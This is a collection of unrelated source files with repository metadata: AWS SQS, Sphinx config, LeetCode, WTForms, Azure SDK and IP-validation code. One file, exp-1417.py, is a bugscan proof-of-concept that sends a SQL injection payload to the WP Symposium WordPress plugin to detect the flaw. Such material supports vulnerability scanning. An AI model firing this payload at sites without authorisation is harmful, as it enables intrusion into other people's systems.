2020-03-25T06:03:23
2020-03-25T06:03:23
249,895,218
0
1
null
2022-12-08T01:23:48
2020-03-25T05:33:05
null
UTF-8
Python
false
false
3,081
#!/edx/app/discovery/venvs/discovery/bin/python3 # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/ # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. 
# import getopt, sys import boto.sqs from boto.sqs.connection import SQSConnection from boto.exception import SQSError def usage(): print 'cq [-c] [-q queue_name] [-o output_file] [-t timeout] [-r region]' def main(): try: opts, args = getopt.getopt(sys.argv[1:], 'hcq:o:t:r:', ['help', 'clear', 'queue=', 'output=', 'timeout=', 'region=']) except: usage() sys.exit(2) queue_name = '' output_file = '' timeout = 30 region = '' clear = False for o, a in opts: if o in ('-h', '--help'): usage() sys.exit() if o in ('-q', '--queue'): queue_name = a if o in ('-o', '--output'): output_file = a if o in ('-c', '--clear'): clear = True if o in ('-t', '--timeout'): timeout = int(a) if o in ('-r', '--region'): region = a if region: c = boto.sqs.connect_to_region(region) if c is None: print 'Invalid region (%s)' % region sys.exit(1) else: c = SQSConnection() if queue_name: try: rs = [c.create_queue(queue_name)] except SQSError as e: print 'An Error Occurred:' print '%s: %s' % (e.status, e.reason) print e.body sys.exit() else: try: rs = c.get_all_queues() except SQSError as e: print 'An Error Occurred:' print '%s: %s' % (e.status, e.reason) print e.body sys.exit() for q in rs: if clear: n = q.clear() print 'clearing %d messages from %s' % (n, q.id) elif output_file: q.dump(output_file) else: print q.id, q.count(vtimeout=timeout) if __name__ == "__main__": main()
[ "josiahk@phyziklabs.com" ]
josiahk@phyziklabs.com
67847d07a9ae4df961e7ab84e973abb383ecefb0
58d6c7927d58ba9782c79624dadd9602c8148daa
/docs/conf.py
bc7bb2ead825b9c212910f5165c69fbd9b43d494
[ "CC-BY-3.0" ]
permissive
benzheren/deform
413c57da9a5e43d6b228c661756e19ff6461cbba
79d8ac16743815f0c24c27c2ca7ea4287dc5ffb4
refs/heads/master
2021-01-15T20:23:55.318165
2011-05-20T03:06:33
2011-05-20T03:06:33
1,549,685
1
0
null
null
null
null
UTF-8
Python
false
false
6,116
py
# -*- coding: utf-8 -*- # # deform documentation build configuration file # # This file is execfile()d with the current directory set to its containing # dir. # # The contents of this file are pickled, so don't put values in the # namespace that aren't pickleable (module imports are okay, they're # removed automatically). # # All configuration values have a default value; values that are commented # out serve to show the default value. import sys, os # If your extensions are in another directory, add it here. If the # directory is relative to the documentation root, use os.path.abspath to # make it absolute, like shown here. #sys.path.append(os.path.abspath('some/directory')) parent = os.path.dirname(os.path.dirname(__file__)) sys.path.append(os.path.abspath(parent)) wd = os.getcwd() os.chdir(parent) os.system('%s setup.py test -q' % sys.executable) os.chdir(wd) for item in os.listdir(parent): if item.endswith('.egg'): sys.path.append(os.path.join(parent, item)) # General configuration # --------------------- # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc'] # Add any paths that contain templates here, relative to this directory. templates_path = ['.templates'] # The suffix of source filenames. source_suffix = '.rst' # The master toctree document. master_doc = 'index' # General substitutions. project = 'deform' copyright = '2011, Agendaless Consulting <pylons-discuss@googlegroups.com>' # The default replacements for |version| and |release|, also used in various # other places throughout the built documents. # # The short X.Y version. version = '0.9' # The full version, including alpha/beta/rc tags. release = version # There are two options for replacing |today|: either, you set today to # some non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. 
today_fmt = '%B %d, %Y' # List of documents that shouldn't be included in the build. #unused_docs = [] # List of directories, relative to source directories, that shouldn't be # searched for source files. #exclude_dirs = [] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # Options for HTML output # ----------------------- sys.path.append(os.path.abspath('_themes')) html_theme_path = ['_themes'] html_theme = 'pylons' # The style sheet to use for HTML and HTML Help pages. A file of that name # must exist either in Sphinx' static/ path, or in one of the custom paths # given in html_static_path. #html_style = 'pylons.css' # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as # html_title. #html_short_title = None # The name of an image file (within the static path) to place at the top of # the sidebar. #html_logo = '.static/logo_hi.gif' # The name of an image file (within the static path) to use as favicon of # the docs. This file should be a Windows icon file (.ico) being 16x16 or # 32x32 pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) # here, relative to this directory. They are copied after the builtin # static files, so a file named "default.css" will overwrite the builtin # "default.css". 
#html_static_path = ['.static'] # If not '', a 'Last updated on:' timestamp is inserted at every page # bottom, using the given strftime format. html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_use_modindex = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, the reST sources are included in the HTML build as # _sources/<name>. #html_copy_source = True # If true, an OpenSearch description file will be output, and all pages # will contain a <link> tag referring to it. The value of this option must # be the base URL from which the finished HTML is served. #html_use_opensearch = '' # If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = '' # Output file base name for HTML help builder. htmlhelp_basename = 'deformdoc' # Options for LaTeX output # ------------------------ # The paper size ('letter' or 'a4'). #latex_paper_size = 'letter' # The font size ('10pt', '11pt' or '12pt'). #latex_font_size = '10pt' # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, document class [howto/manual]). latex_documents = [ ('index', 'deform.tex', 'deform Documentation', 'Pylons Developers', 'manual'), ] # The name of an image file (relative to this directory) to place at the # top of the title page. latex_logo = '.static/logo_hi.gif' # For "manual" documents, if this is true, then toplevel headings are # parts, not chapters. #latex_use_parts = False # Additional stuff for the LaTeX preamble. 
#latex_preamble = '' # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_use_modindex = True
[ "chrism@plope.com" ]
chrism@plope.com
425d0243808928a0a7b2acc6b6c87210f7a7790a
81a72409096ad1dd5c443ebcbe6309cb8e6050d7
/389.py
bf147eda1da9f8220859494370cda76aaf116a57
[]
no_license
plee0117/LC
57a06a18316680d202e417c7fbba2c90139908f3
75fe9ce131699854a468b829508d0636e4a820c4
refs/heads/master
2021-05-18T22:08:36.600206
2020-08-21T14:47:19
2020-08-21T14:47:19
251,446,370
0
0
null
null
null
null
UTF-8
Python
false
false
221
py
class Solution:
    def findTheDifference(self, s: str, t: str) -> str:
        """LeetCode 389: t is s shuffled with exactly one extra character
        appended; return that extra character.

        BUG FIX / generalization: the previous implementation overwrote
        matched characters in t with the sentinel '0' and summed leftover
        indices, which gives a wrong answer or IndexError when the input
        itself contains '0' (e.g. s="00a", t="a000").  A multiset
        difference needs no sentinel and runs in O(len(t)).
        """
        from collections import Counter  # local import keeps the file's top-level surface unchanged
        # Whatever remains after removing s's characters from t is the
        # single extra character (count 1).
        extra = Counter(t) - Counter(s)
        return next(iter(extra))
[ "emailme.paul@gmail.com" ]
emailme.paul@gmail.com
5833cd7532aeb6518a79c95a2078387fb6f85c44
701086eb3c858cf7e677f4e901b37ca26752b494
/app/forms/validators.py
c76bb90bf7fee5ddd0a67d6cc97ef807167875df
[]
no_license
anshulkgupta/eventum
e38f19678358b42f0336c642d818e8e8ed14c84b
4b36ed879694b650c1e5a1eefea7c36855ccf221
refs/heads/master
2021-01-18T01:24:52.697223
2014-10-26T23:09:11
2014-10-26T23:09:11
null
0
0
null
null
null
null
UTF-8
Python
false
false
276
py
from app.models import Image
from wtforms.validators import ValidationError


def image_with_same_name(form, field):
    """WTForms validator: require exactly one stored Image with this filename.

    Raises:
        ValidationError: when ``field.data`` does not match exactly one
            Image document.

    BUG FIX: the error was previously *returned*, not raised.  WTForms
    only treats a raised ValidationError as a failure, so the validator
    silently passed every input.
    """
    if Image.objects(filename=field.data).count() != 1:
        raise ValidationError(
            message="Can't find image `%s` in the database" % field.data)
[ "dan.r.schlosser@gmail.com" ]
dan.r.schlosser@gmail.com
335af7220f389eddf0baa1cf0cb97e3f9ba72f03
52b5773617a1b972a905de4d692540d26ff74926
/.history/valid_20200616212636.py
96b5562d02e05c82fb1fac891633e27e6b568d99
[]
no_license
MaryanneNjeri/pythonModules
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
f4e56b1e4dda2349267af634a46f6b9df6686020
refs/heads/master
2022-12-16T02:59:19.896129
2020-09-11T12:05:22
2020-09-11T12:05:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,064
py
# Ipv4 --> 4 decimal numbers,between 0 to 255 # leading zero's is invalid # check whethere its a digit between 0 to 255 import string def valid(str): address = str.split(".") numbers = range(0,256) for a in address: if len(address) == 4: if int(a) in numbers and a.isdigit() : if len(a) == 2 and a[0] == "0": return "Neither" else: return "IPv4" else: if str[len(str)-1] == ":": return "Neither" else: newAddress = str.split(":") i = 0 while i < len(newAddress)-1: print(newAddress[i]) well = all(c in string.hexdigits for c in newAddress[i]) if well == True: print("well",well) # return "IPv6" else: return "Neither" i +=1 print(valid("1e1.4.5.6"))
[ "mary.jereh@gmail.com" ]
mary.jereh@gmail.com
c574584397da1b7c40f83de3d2d3e61524bd6fe3
427ab1f7f7fe08f76fab6468f6ea24dc5bc2701d
/bugscan/exp-1417.py
512fd0c3befeec133428d005a8e6659d524b5658
[]
no_license
gayhub-blackerie/poc
b852b2bcdba78185efd68817c31579247c6e4b83
8b7c95d765deb450c029a921031eb1c90418f2a7
refs/heads/master
2021-07-24T03:05:52.697820
2017-11-04T10:33:51
2017-11-04T10:33:51
107,093,079
1
0
null
2017-10-16T07:31:31
2017-10-16T07:31:31
null
UTF-8
Python
false
false
636
py
# !/usr/bin/dev python # -*- coding:utf-8 -*- #__Author__ = buliuchang # __refer__ = https://www.exploit-db.com/exploits/37244/ def assign(service, arg): if service == "wordpress": return True, arg def audit(arg): payload='wp-content/plugins/wp-symposium/get_album_item.php?size=md5(1);--' target=arg+payload code, head, res, ecode, redirect_url =curl.curl(target) if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in res: security_hole(target) if __name__ == '__main__': from dummy import * audit(assign('wordpress', 'http://localhost/wordpress/')[1])
[ "hackerlq@gmail.com" ]
hackerlq@gmail.com
c709ea8f114d9d9959cffc3733087f2b1ecde092
a5ba631dddaf2912c309601f8fbdd3c5b494fe20
/src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/sdk/devtestlabs/models/lab_cost.py
166f2a5b9ee62cebfd056824a45a6b13ca19aa6f
[ "MIT" ]
permissive
saurabsa/azure-cli-old
37471020cd2af9a53e949e739643299f71037565
f77477a98c9aa9cb55daf5b0d2f410d1455a9225
refs/heads/master
2023-01-09T04:00:15.642883
2018-04-23T21:40:04
2018-04-23T21:40:04
130,759,501
0
0
NOASSERTION
2022-12-27T14:59:06
2018-04-23T21:33:34
Python
UTF-8
Python
false
false
4,236
py
# coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# coding: utf-8
# pylint: skip-file
# Vendored msrest model generated from the Azure DevTest Labs API spec;
# do not hand-edit the attribute map without updating the source swagger.
from msrest.serialization import Model


class LabCost(Model):
    """A cost item.

    :param target_cost: The target cost properties
    :type target_cost: :class:`TargetCostProperties
     <azure.mgmt.devtestlabs.models.TargetCostProperties>`
    :param lab_cost_summary: The lab cost summary component of the cost data.
    :type lab_cost_summary: :class:`LabCostSummaryProperties
     <azure.mgmt.devtestlabs.models.LabCostSummaryProperties>`
    :param lab_cost_details: The lab cost details component of the cost data.
    :type lab_cost_details: list of :class:`LabCostDetailsProperties
     <azure.mgmt.devtestlabs.models.LabCostDetailsProperties>`
    :param resource_costs: The resource cost component of the cost data.
    :type resource_costs: list of :class:`LabResourceCostProperties
     <azure.mgmt.devtestlabs.models.LabResourceCostProperties>`
    :param currency_code: The currency code of the cost.
    :type currency_code: str
    :param start_date_time: The start time of the cost data.
    :type start_date_time: datetime
    :param end_date_time: The end time of the cost data.
    :type end_date_time: datetime
    :param created_date: The creation date of the cost.
    :type created_date: datetime
    :param provisioning_state: The provisioning status of the resource.
    :type provisioning_state: str
    :param unique_identifier: The unique immutable identifier of a resource
     (Guid).
    :type unique_identifier: str
    :param id: The identifier of the resource.
    :type id: str
    :param name: The name of the resource.
    :type name: str
    :param type: The type of the resource.
    :type type: str
    :param location: The location of the resource.
    :type location: str
    :param tags: The tags of the resource.
    :type tags: dict
    """

    # Maps each Python attribute to its wire (JSON) key and the msrest
    # type token used by the serializer/deserializer.
    _attribute_map = {
        'target_cost': {'key': 'properties.targetCost', 'type': 'TargetCostProperties'},
        'lab_cost_summary': {'key': 'properties.labCostSummary', 'type': 'LabCostSummaryProperties'},
        'lab_cost_details': {'key': 'properties.labCostDetails', 'type': '[LabCostDetailsProperties]'},
        'resource_costs': {'key': 'properties.resourceCosts', 'type': '[LabResourceCostProperties]'},
        'currency_code': {'key': 'properties.currencyCode', 'type': 'str'},
        'start_date_time': {'key': 'properties.startDateTime', 'type': 'iso-8601'},
        'end_date_time': {'key': 'properties.endDateTime', 'type': 'iso-8601'},
        'created_date': {'key': 'properties.createdDate', 'type': 'iso-8601'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
        'unique_identifier': {'key': 'properties.uniqueIdentifier', 'type': 'str'},
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
    }

    def __init__(self, target_cost=None, lab_cost_summary=None, lab_cost_details=None, resource_costs=None, currency_code=None, start_date_time=None, end_date_time=None, created_date=None, provisioning_state=None, unique_identifier=None, id=None, name=None, type=None, location=None, tags=None):
        # Plain attribute assignment; msrest's Model handles
        # (de)serialization via _attribute_map above.
        self.target_cost = target_cost
        self.lab_cost_summary = lab_cost_summary
        self.lab_cost_details = lab_cost_details
        self.resource_costs = resource_costs
        self.currency_code = currency_code
        self.start_date_time = start_date_time
        self.end_date_time = end_date_time
        self.created_date = created_date
        self.provisioning_state = provisioning_state
        self.unique_identifier = unique_identifier
        self.id = id
        self.name = name
        self.type = type
        self.location = location
        self.tags = tags
[ "saurabsa@microsoft.com" ]
saurabsa@microsoft.com
3fcb753340d6c17fbec10dfc3e30c46fe86be655
60c5716fc0abcb6fcb5d7cf0a06efe0fcb7be56a
/docs/source/conf.py
311b7b47f8220ed602549ee241d3f523f61e9abd
[ "BSD-2-Clause", "Apache-2.0" ]
permissive
cedadev/housemartin
46b5ce3107dab02f1c6b2ccd788570913b59a30e
9d8c75e460a6dc46435760d15dc97ca9141e742f
refs/heads/main
2023-03-26T00:49:49.435008
2021-03-26T14:04:05
2021-03-26T14:04:05
337,997,635
0
0
null
null
null
null
UTF-8
Python
false
false
7,046
py
#!/usr/bin/env python # -*- coding: utf-8 -*- # # housemartin documentation build configuration file, created by # sphinx-quickstart on Fri Jun 9 13:47:02 2017. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. # If extensions (or modules to document with autodoc) are in another # directory, add these directories to sys.path here. If the directory is # relative to the documentation root, use os.path.abspath to make it # absolute, like shown here. # import os import sys # Add housemartin to sys.path to avoid having to full # install housemartin for autodoc. # Full install of housemartin will burst memory limit on ReadTheDocs. sys.path.insert(0, os.path.abspath("../../")) # -- General configuration --------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = [ "sphinx.ext.autodoc", "sphinx.ext.viewcode", "sphinx.ext.mathjax", "sphinx.ext.napoleon", "sphinx.ext.todo", "pywps.ext_autodoc", "sphinx.ext.autosectionlabel", # "sphinx.ext.imgconverter", # "nbsphinx", # "IPython.sphinxext.ipython_console_highlighting", ] # To avoid having to install these and burst memory limit on ReadTheDocs. # List of all tested working mock imports from all birds so new birds can # inherit without having to test which work which do not. 
autodoc_mock_imports = [ "numpy", "xarray", "fiona", "rasterio", "shapely", "osgeo", "geopandas", "pandas", "statsmodels", "affine", "rasterstats", "spotpy", "matplotlib", "scipy", "unidecode", "gdal", "sentry_sdk", "dask", "numba", "parse", "siphon", "sklearn", "cftime", "netCDF4", "bottleneck", "ocgis", "geotiff", "geos", "hdf4", "hdf5", "zlib", "pyproj", "proj", "cartopy", "scikit-learn", "cairo", "networkx", "roocs_utils", "daops", ] # Monkeypatch constant because the following are mock imports. # Only works if numpy is actually installed and at the same time being mocked. # import numpy # numpy.pi = 3.1416 # We are using mock imports in readthedocs, so probably safer to not run the notebooks nbsphinx_execute = "never" # Add any paths that contain templates here, relative to this directory. templates_path = ["_templates"] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = ".rst" # The master toctree document. master_doc = "index" # General information about the project. project = "housemartin" copyright = "2020, Carsten Ehbrecht" author = "Carsten Ehbrecht" # The version info for the project you're documenting, acts as replacement # for |version| and |release|, also used in various other places throughout # the built documents. # # The short X.Y version. # version = "0.1.0" # The full version, including alpha/beta/rc tags. "0.2.0" # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. 
# Patterns (relative to the source directory) excluded when collecting
# source files; these also apply to html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store", "**.ipynb_checkpoints"]

# Pygments style used for syntax highlighting.
pygments_style = "sphinx"

# Do not render `todo` and `todoList` directives in the output.
todo_include_todos = False

# Silence "WARNING: unknown mimetype for ..." when building the EPUB.
suppress_warnings = ["epub.unknown_project_files"]

# Prefix autosection labels with the document name, avoiding
# "duplicate label ..." warnings between documents that share headings.
autosectionlabel_prefix_document = True

# -- Options for HTML output -------------------------------------------

# Theme for HTML and HTML Help pages; see the Sphinx docs for the list of
# builtin themes.
html_theme = "alabaster"

# Theme-specific look-and-feel options; empty keeps the theme defaults.
# html_theme_options = {}

# Image placed at the top of the sidebar (relative to this directory).
html_logo = "_static/birdhouse_logo.svg"

# Favicon of the docs: a 16x16 or 32x32 Windows .ico inside the static path.
html_favicon = "_static/favicon.ico"

# Custom static files (e.g. style sheets). These are copied after the
# builtin static files, so a local "default.css" overrides the builtin one.
html_static_path = ["_static"]

# -- Options for HTMLHelp output ---------------------------------------

# Output file base name for the HTML help builder.
htmlhelp_basename = "housemartindoc"

# -- Options for LaTeX output ------------------------------------------

# All LaTeX options keep their defaults: 'papersize' ('letterpaper' or
# 'a4paper'), 'pointsize' ('10pt'/'11pt'/'12pt'), 'preamble', and
# 'figure_align' ('htbp').
latex_elements = {}

# One LaTeX document: (source start file, target name, title, author,
# documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, "housemartin.tex", "housemartin Documentation",
     "Carsten Ehbrecht", "manual"),
]

# -- Options for manual page output ------------------------------------

# One entry per manual page: (source start file, name, description,
# authors, manual section).
man_pages = [
    (master_doc, "housemartin", "housemartin Documentation", [author], 1),
]

# -- Options for Texinfo output ----------------------------------------

# One Texinfo document: (source start file, target name, title, author,
# dir menu entry, description, category).
texinfo_documents = [
    (master_doc, "housemartin", "housemartin Documentation", author,
     "housemartin", "A WPS service for roocs.", "Miscellaneous"),
]
[ "ag.stephens@stfc.ac.uk" ]
ag.stephens@stfc.ac.uk